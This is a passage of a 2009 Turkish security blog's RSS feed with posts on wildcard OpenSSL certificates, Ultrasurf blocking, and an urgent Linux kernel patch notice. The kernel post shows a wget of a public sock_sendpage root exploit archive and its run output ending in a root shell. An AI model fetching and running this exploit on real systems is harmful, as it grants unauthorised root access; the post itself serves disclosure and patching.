	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F&amp;title=Iptables%27in%20s%C4%B1n%C4%B1rlar%C4%B1n%C4%B1%20zorlamak%20-%201%20milyon%20nat%20kural%C4%B1&amp;notes=%0D%0A%0D%0ABir%20projede%20%C5%9F%C3%B6yle%20bir%20ihtiya%C3%A7%20oldu%3A%20Bridge%20modda%20%C3%A7al%C4%B1%C5%9F%C4%B1p%20belirli%20adreslere%281000.000%20farkl%C4%B1%20ip%20adresi%29%20giden%20istekler%20yereldeki%20bir%20proxy%27e%20y%C3%B6nlendirilecek%20ve%20kullan%C4%B1c%C4%B1ya%20uyar%C4%B1%20g%C3%B6sterilecek.%0D%0A%0D%0A%C2%A0%0D%0A%0D%0ABelirli%20adresler%20haricine%20gidecek%20" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F&amp;t=Iptables%27in%20s%C4%B1n%C4%B1rlar%C4%B1n%C4%B1%20zorlamak%20-%201%20milyon%20nat%20kural%C4%B1" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F&amp;title=Iptables%27in%20s%C4%B1n%C4%B1rlar%C4%B1n%C4%B1%20zorlamak%20-%201%20milyon%20nat%20kural%C4%B1" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F&amp;title=Iptables%27in%20s%C4%B1n%C4%B1rlar%C4%B1n%C4%B1%20zorlamak%20-%201%20milyon%20nat%20kural%C4%B1&amp;annotation=%0D%0A%0D%0ABir%20projede%20%C5%9F%C3%B6yle%20bir%20ihtiya%C3%A7%20oldu%3A%20Bridge%20modda%20%C3%A7al%C4%B1%C5%9F%C4%B1p%20belirli%20adreslere%281000.000%20farkl%C4%B1%20ip%20adresi%29%20giden%20istekler%20yereldeki%20bir%20proxy%27e%20y%C3%B6nlendirilecek%20ve%20kullan%C4%B1c%C4%B1ya%20uyar%C4%B1%20g%C3%B6sterilecek.%0D%0A%0D%0A%C2%A0%0D%0A%0D%0ABelirli%20adresler%20haricine%20gidecek%20" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F&amp;title=Iptables%27in%20s%C4%B1n%C4%B1rlar%C4%B1n%C4%B1%20zorlamak%20-%201%20milyon%20nat%20kural%C4%B1" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=Iptables%27in%20s%C4%B1n%C4%B1rlar%C4%B1n%C4%B1%20zorlamak%20-%201%20milyon%20nat%20kural%C4%B1%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F09%2F02%2Fiptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2007/05/22/guvenlik-sistemlerine-dayaniklilik-testi/' rel='bookmark' title='Permanent Link: Guvenlik sistemlerine dayaniklilik testi'>Guvenlik sistemlerine dayaniklilik testi</a></li>
<li><a href='http://blog.lifeoverip.net/2006/05/20/oturum-kurulmus-tcp-baglantilarini-sonlandirma/' rel='bookmark' title='Permanent Link: Oturum kurulmus TCP baglantilarini Sonlandirma'>Oturum kurulmus TCP baglantilarini Sonlandirma</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2009/09/02/iptablesin-sinirlarini-zorlamak-1-milyon-nat-kurali/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>OpenSSL ile wildcard sertifika üretimi</title>
		<link>http://blog.lifeoverip.net/2009/08/20/openssl-ile-wildcard-sertifika-uretimi/</link>
		<comments>http://blog.lifeoverip.net/2009/08/20/openssl-ile-wildcard-sertifika-uretimi/#comments</comments>
		<pubDate>Thu, 20 Aug 2009 17:52:37 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[Linux Security]]></category>
		<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[System Security]]></category>
		<category><![CDATA[openssl]]></category>
		<category><![CDATA[ssl]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=1422</guid>
		<description><![CDATA[Wildcard sertifikalar tek bir sertifika ile birden fazla web sitesini güvenli hale getirmek için kullanılır. Sayısal sertifiakaların domain isimlerine alındığı gözönüne alınırsa aynı domaine ait her alt domain için farklı sertifika alımı gerekecektir(Örn: www.lifeoverip.net, vpn.lifeoverip.net, mail.lifeoverip.net) Wildcard sertifikayla  aynı domaine ait tüm subdomainler için tek bir sertifika yeterli olacaktır. OpenSSL ile Wildcard sertifika üretimi Wildcard [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2008/05/20/debian-openssl-guvenlik-zaafiyeti/' rel='bookmark' title='Permanent Link: Debian OpenSSL guvenlik zaafiyeti'>Debian OpenSSL guvenlik zaafiyeti</a></li>
<li><a href='http://blog.lifeoverip.net/2009/03/01/pratik-openssl-kullanimi/' rel='bookmark' title='Permanent Link: Pratik OpenSSL Kullanımı'>Pratik OpenSSL Kullanımı</a></li>
<li><a href='http://blog.lifeoverip.net/2007/04/15/freebsd-openvpn-kurulumu/' rel='bookmark' title='Permanent Link: FreeBSD uzerinde  OpenVPN Kurulum ve ayarlari'>FreeBSD uzerinde  OpenVPN Kurulum ve ayarlari</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.globalsign.com.tr/sertifikalar/wildcard.asp">Wildcard sertifikalar</a> tek bir sertifika ile birden fazla web sitesini güvenli hale getirmek için kullanılır. Sayısal sertifiakaların domain isimlerine alındığı gözönüne alınırsa aynı domaine ait her alt domain için farklı sertifika alımı gerekecektir(Örn: www.lifeoverip.net, vpn.lifeoverip.net, mail.lifeoverip.net) Wildcard sertifikayla  aynı domaine ait tüm subdomainler için tek bir sertifika yeterli olacaktır.</p>
<p><strong>OpenSSL ile Wildcard sertifika üretimi</strong></p>
<p>Wildcard sertifika üretiminin normal sertifika üretimlerinden farkı yoktur. Sadece host isminin yazıldığı alana www.lifeoverip.net yerine *.lifeoverip.net yazılması gerekir.</p>
<p style="padding-left: 30px;"><strong># openssl req -new -keyout ./wildcard.req -out ./wildcard.req -days 3652</strong><br />
Generating a 1024 bit RSA private key<br />
&#8230;..++++++<br />
&#8230;..++++++<br />
writing new private key to &#8216;./wildcard.req&#8217;<br />
Enter PEM pass phrase:<br />
Verifying &#8211; Enter PEM pass phrase:<br />
phrase is too short, needs to be at least 4 chars<br />
Enter PEM pass phrase:<br />
Verifying &#8211; Enter PEM pass phrase:<br />
&#8212;&#8211;<span id="more-1422"></span><br />
&#8212;&#8211;<br />
Country Name (2 letter code) [TR]:<br />
State or Province Name (full name) [IStanbul]:<br />
Locality Name (eg, city) []:<br />
Organization Name (eg, company) [Lifeoverip Consultant Services]:<br />
Organizational Unit Name (eg, section) []:Security<br />
<strong>Common Name (eg, YOUR name) []:*.lifeoverip.net</strong><br />
Email Address []:huzeyfe@lifeoverip.net</p>
<p>Please enter the following &#8216;extra&#8217; attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:</p>
<p>Oluşturulan wildcard sertifika isteği yetkili bir CA&#8217;e gönderilip imzalaması istenebilir ya da kendi CA&#8217;nızı kullanarak imzalayabilirsiniz.
</p>
<p style="padding-left: 30px;"><strong># openssl ca -policy policy_anything -out wildcard.crt -infiles wildcard.req</strong><br />
Using configuration from /etc/ssl/openssl.cnf<br />
Enter pass phrase for /etc/ssl/sslCA/private/cakey.pem:<br />
Check that the request matches the signature<br />
Signature ok<br />
Certificate Details:<br />
Serial Number: 4097 (0&#215;1001)<br />
Validity<br />
Not Before: Aug 14 08:36:12 2009 GMT<br />
Not After : Aug 14 08:36:12 2010 GMT<br />
Subject:<br />
countryName               = TR<br />
stateOrProvinceName       = IStanbul<br />
organizationName          = Lifeoverip Consultant Services<br />
organizationalUnitName    = Security<br />
<strong>commonName                = *.lifeoverip.net</strong><br />
emailAddress              = huzeyfe@lifeoverip.net<br />
X509v3 extensions:<br />
X509v3 Basic Constraints:<br />
CA:FALSE<br />
Netscape Comment:<br />
OpenSSL Generated Certificate<br />
X509v3 Subject Key Identifier:<br />
33:B8:C2:5A:08:92:E7:64:5D:25:E5:6D:F5:08:A8:9B:37:0A:BF:BE<br />
X509v3 Authority Key Identifier:<br />
keyid:13:F6:E5:86:48:EB:E5:6A:8A:CC:BC:72:28:75:0D:38:89:20:28:45</p>
<p>Certificate is to be certified until Aug 14 08:36:12 2010 GMT (365 days)<br />
Sign the certificate? [y/n]:y</p>
<p>1 out of 1 certificate requests certified, commit? [y/n]y<br />
Write out database with 1 new entries<br />
Data Base Updated</p>
<p>Üretilen sertifikanın browserlar tarafından görünümü:</p>
<p><img class="alignleft size-full wp-image-1424" title="wildcard_loip" src="http://blog.lifeoverip.net/wp-content/uploads/2009/08/wildcard_loip.jpg" alt="wildcard_loip" width="511" height="350" /></p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F&amp;title=OpenSSL%20ile%20wildcard%20sertifika%20%C3%BCretimi&amp;bodytext=Wildcard%20sertifikalar%20tek%20bir%20sertifika%20ile%20birden%20fazla%20web%20sitesini%20g%C3%BCvenli%20hale%20getirmek%20i%C3%A7in%20kullan%C4%B1l%C4%B1r.%20Say%C4%B1sal%20sertifiakalar%C4%B1n%20domain%20isimlerine%20al%C4%B1nd%C4%B1%C4%9F%C4%B1%20g%C3%B6z%C3%B6n%C3%BCne%20al%C4%B1n%C4%B1rsa%20ayn%C4%B1%20domaine%20ait%20her%20alt%20domain%20i%C3%A7in%20farkl%C4%B1%20sertifika%20" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F&amp;title=OpenSSL%20ile%20wildcard%20sertifika%20%C3%BCretimi&amp;notes=Wildcard%20sertifikalar%20tek%20bir%20sertifika%20ile%20birden%20fazla%20web%20sitesini%20g%C3%BCvenli%20hale%20getirmek%20i%C3%A7in%20kullan%C4%B1l%C4%B1r.%20Say%C4%B1sal%20sertifiakalar%C4%B1n%20domain%20isimlerine%20al%C4%B1nd%C4%B1%C4%9F%C4%B1%20g%C3%B6z%C3%B6n%C3%BCne%20al%C4%B1n%C4%B1rsa%20ayn%C4%B1%20domaine%20ait%20her%20alt%20domain%20i%C3%A7in%20farkl%C4%B1%20sertifika%20" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F&amp;t=OpenSSL%20ile%20wildcard%20sertifika%20%C3%BCretimi" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F&amp;title=OpenSSL%20ile%20wildcard%20sertifika%20%C3%BCretimi" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F&amp;title=OpenSSL%20ile%20wildcard%20sertifika%20%C3%BCretimi&amp;annotation=Wildcard%20sertifikalar%20tek%20bir%20sertifika%20ile%20birden%20fazla%20web%20sitesini%20g%C3%BCvenli%20hale%20getirmek%20i%C3%A7in%20kullan%C4%B1l%C4%B1r.%20Say%C4%B1sal%20sertifiakalar%C4%B1n%20domain%20isimlerine%20al%C4%B1nd%C4%B1%C4%9F%C4%B1%20g%C3%B6z%C3%B6n%C3%BCne%20al%C4%B1n%C4%B1rsa%20ayn%C4%B1%20domaine%20ait%20her%20alt%20domain%20i%C3%A7in%20farkl%C4%B1%20sertifika%20" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F&amp;title=OpenSSL%20ile%20wildcard%20sertifika%20%C3%BCretimi" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=OpenSSL%20ile%20wildcard%20sertifika%20%C3%BCretimi%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F20%2Fopenssl-ile-wildcard-sertifika-uretimi%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2008/05/20/debian-openssl-guvenlik-zaafiyeti/' rel='bookmark' title='Permanent Link: Debian OpenSSL guvenlik zaafiyeti'>Debian OpenSSL guvenlik zaafiyeti</a></li>
<li><a href='http://blog.lifeoverip.net/2009/03/01/pratik-openssl-kullanimi/' rel='bookmark' title='Permanent Link: Pratik OpenSSL Kullanımı'>Pratik OpenSSL Kullanımı</a></li>
<li><a href='http://blog.lifeoverip.net/2007/04/15/freebsd-openvpn-kurulumu/' rel='bookmark' title='Permanent Link: FreeBSD uzerinde  OpenVPN Kurulum ve ayarlari'>FreeBSD uzerinde  OpenVPN Kurulum ve ayarlari</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2009/08/20/openssl-ile-wildcard-sertifika-uretimi/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Time To Patch Linux Kernel</title>
		<link>http://blog.lifeoverip.net/2009/08/18/time-to-patch-linux-kernel/</link>
		<comments>http://blog.lifeoverip.net/2009/08/18/time-to-patch-linux-kernel/#comments</comments>
		<pubDate>Tue, 18 Aug 2009 05:54:35 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[Linux Security]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=1415</guid>
		<description><![CDATA[Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(Linux Kernel &#8216;sock_sendpage()&#8217; NULL Pointer Dereference Vulnerability). Ozellikle paylasimli sistem kullanip shell hesabi verenlerin acilen güncellemesini öneriyorum. Aciklikla ilgili çalışan exploitler ve yamalar çıkmış durumda. Açıklık kullanılarak tek bir komutla siradan bir user root haklarini elde edebiliyor. Klasik exploitlerden farklı olarak exploit yazari derleme vs [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2008/09/15/linux-leothe-law-enforcement-and-forensic-examiners-introduction-to-linux/' rel='bookmark' title='Permanent Link: Linux LEO(The Law Enforcement and Forensic Examiner&#8217;s Introduction to Linux)'>Linux LEO(The Law Enforcement and Forensic Examiner&#8217;s Introduction to Linux)</a></li>
<li><a href='http://blog.lifeoverip.net/2010/05/01/linux-parola-guvenligi/' rel='bookmark' title='Permanent Link: Linux parola güvenliği'>Linux parola güvenliği</a></li>
<li><a href='http://blog.lifeoverip.net/2010/09/01/medusa-network-servislerine-yonelik-bruteforce-test-araci/' rel='bookmark' title='Permanent Link: Medusa &#8211; Network servislerine yönelik bruteforce test aracı'>Medusa &#8211; Network servislerine yönelik bruteforce test aracı</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(<span>Linux Kernel &#8216;sock_sendpage()&#8217; NULL Pointer Dereference Vulnerability</span>). Ozellikle paylasimli sistem kullanip shell hesabi verenlerin acilen güncellemesini öneriyorum.</p>
<p>Aciklikla ilgili çalışan exploitler ve yamalar çıkmış durumda.</p>
<p>Açıklık kullanılarak tek bir komutla siradan bir user root haklarini elde edebiliyor. Klasik exploitlerden farklı olarak exploit yazari derleme vs islemleriyle ugrasilmasin diye bir bash scripti hazirlamis:). Tak calistir mahiyetinde.</p>
<p><strong>Exploit kullanmadan onceki kullanici haklari.</strong><br />
$ id<br />
uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe)</p>
<p><strong>Exploitin kullanimi</strong></p>
<p># wget http://www.grsecurity.net/~spender/exploitx.tgz<br />
huzeyfe@guvenlis:/tmp$ cd exploitx<br />
huzeyfe@guvenlis:/tmp/exploitx$ ls<br />
exploit.c  pwnkernel.c  tzameti.avi  wunderbar_emporium.sh<br />
huzeyfe@guvenlikod:/tmp/wunderbar_emporium$ ./exploitx.sh<br />
[+] Personality set to: PER_SVR4<br />
E: x11wrap.c: XOpenDisplay() failed<br />
E: module.c: Failed to load  module &#8220;module-x11-publish&#8221; (argument: &#8220;&#8221;): initialization failed.<br />
[+] MAPPED ZERO PAGE!<br />
[+] Resolved selinux_enforcing to 0xc05b4b7c<br />
[+] Resolved selinux_enabled to 0xc05b4b78<br />
[+] Resolved apparmor_enabled to 0xc04798a4<br />
[+] Resolved apparmor_complain to 0xc05b6770<br />
[+] Resolved apparmor_audit to 0xc05b6778<br />
[+] Resolved apparmor_logsyscall to 0xc05b677c<br />
[+] Resolved security_ops to 0xc05b3324<br />
[+] Resolved default_security_ops to 0xc0478640<br />
[+] Resolved sel_read_enforce to 0xc021fa60<br />
[+] Resolved audit_enabled to 0xc0574544<br />
[+] got ring0!<br />
[+] detected 2.6 style 8k stacks<br />
[+] Disabled security of : LSM<br />
<strong>[+] Got root!<br />
#<br />
# id<br />
uid=0(root) gid=0(root) groups=1001(huzeyfe)</strong><br />
Detaylar icin : <a href="http://www.securityfocus.com/bid/36038/info" target="_blank">http://www.securityfocus.com/bid/36038/info</a></p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F&amp;title=Time%20To%20Patch%20Linux%20Kernel&amp;bodytext=Linux%20kernel%202.4.X%20ve%202.6.X%20s%C3%BCr%C3%BCmlerini%20etkileyen%20sifir%20gun%20acigi%20yayinlandi%28Linux%20Kernel%20%27sock_sendpage%28%29%27%20NULL%20Pointer%20Dereference%20Vulnerability%29.%20Ozellikle%20paylasimli%20sistem%20kullanip%20shell%20hesabi%20verenlerin%20acilen%20g%C3%BCncellemesini%20%C3%B6neriyorum.%0D%0A%0D" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F&amp;title=Time%20To%20Patch%20Linux%20Kernel&amp;notes=Linux%20kernel%202.4.X%20ve%202.6.X%20s%C3%BCr%C3%BCmlerini%20etkileyen%20sifir%20gun%20acigi%20yayinlandi%28Linux%20Kernel%20%27sock_sendpage%28%29%27%20NULL%20Pointer%20Dereference%20Vulnerability%29.%20Ozellikle%20paylasimli%20sistem%20kullanip%20shell%20hesabi%20verenlerin%20acilen%20g%C3%BCncellemesini%20%C3%B6neriyorum.%0D%0A%0D" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F&amp;t=Time%20To%20Patch%20Linux%20Kernel" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F&amp;title=Time%20To%20Patch%20Linux%20Kernel" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F&amp;title=Time%20To%20Patch%20Linux%20Kernel&amp;annotation=Linux%20kernel%202.4.X%20ve%202.6.X%20s%C3%BCr%C3%BCmlerini%20etkileyen%20sifir%20gun%20acigi%20yayinlandi%28Linux%20Kernel%20%27sock_sendpage%28%29%27%20NULL%20Pointer%20Dereference%20Vulnerability%29.%20Ozellikle%20paylasimli%20sistem%20kullanip%20shell%20hesabi%20verenlerin%20acilen%20g%C3%BCncellemesini%20%C3%B6neriyorum.%0D%0A%0D" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F&amp;title=Time%20To%20Patch%20Linux%20Kernel" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=Time%20To%20Patch%20Linux%20Kernel%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F08%2F18%2Ftime-to-patch-linux-kernel%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2008/09/15/linux-leothe-law-enforcement-and-forensic-examiners-introduction-to-linux/' rel='bookmark' title='Permanent Link: Linux LEO(The Law Enforcement and Forensic Examiner&#8217;s Introduction to Linux)'>Linux LEO(The Law Enforcement and Forensic Examiner&#8217;s Introduction to Linux)</a></li>
<li><a href='http://blog.lifeoverip.net/2010/05/01/linux-parola-guvenligi/' rel='bookmark' title='Permanent Link: Linux parola güvenliği'>Linux parola güvenliği</a></li>
<li><a href='http://blog.lifeoverip.net/2010/09/01/medusa-network-servislerine-yonelik-bruteforce-test-araci/' rel='bookmark' title='Permanent Link: Medusa &#8211; Network servislerine yönelik bruteforce test aracı'>Medusa &#8211; Network servislerine yönelik bruteforce test aracı</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2009/08/18/time-to-patch-linux-kernel/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ultrasurf Bloklama-II(Snort, OpenBSD PF)</title>
		<link>http://blog.lifeoverip.net/2009/05/17/ultrasurf-bloklama-iisnort-openbsd-pf/</link>
		<comments>http://blog.lifeoverip.net/2009/05/17/ultrasurf-bloklama-iisnort-openbsd-pf/#comments</comments>
		<pubDate>Sun, 17 May 2009 22:51:54 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[Linux Security]]></category>
		<category><![CDATA[Privacy]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=1149</guid>
		<description><![CDATA[Ultrasurf antisansür yazılımı çeşitli network güvenlik cihazlarına yakalanmamak için çok akıllı yöntemler kullanıyor. Mesela ilk başlatıldığında çeşitli gerçek  domain isimlerine dns istekleri gönderiyor, bilinen sitelere(intel.com, microsoft.com, cnn.com vs  443. porttan bağlanmaya çalışıyor) arada da kendi proxylerine bağlantı isteği gönderiyor ve bağlantı kurabilirse devam ediyor, kuramazsa diğer proxy ip adreslerini deniyor. Böylece ip adresinden bloklama yapmak [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2010/05/02/snort-kullanarak-ultrasurf-engelleme/' rel='bookmark' title='Permanent Link: Snort kullanarak Ultrasurf engelleme'>Snort kullanarak Ultrasurf engelleme</a></li>
<li><a href='http://blog.lifeoverip.net/2007/05/20/openbsd-snort-nips-olarak-kullanmaksnort_inline-for-openbsd/' rel='bookmark' title='Permanent Link: OpenBSD &amp; Snort NIPS Olarak Kullanmak(snort_inline for OpenBSd)'>OpenBSD &amp; Snort NIPS Olarak Kullanmak(snort_inline for OpenBSd)</a></li>
<li><a href='http://blog.lifeoverip.net/2009/05/17/ultrasurf-ile-firewall-kurallarini-asma/' rel='bookmark' title='Permanent Link: Ultrasurf ile Firewall kurallarını aşma'>Ultrasurf ile Firewall kurallarını aşma</a></li>
</ol>]]></description>
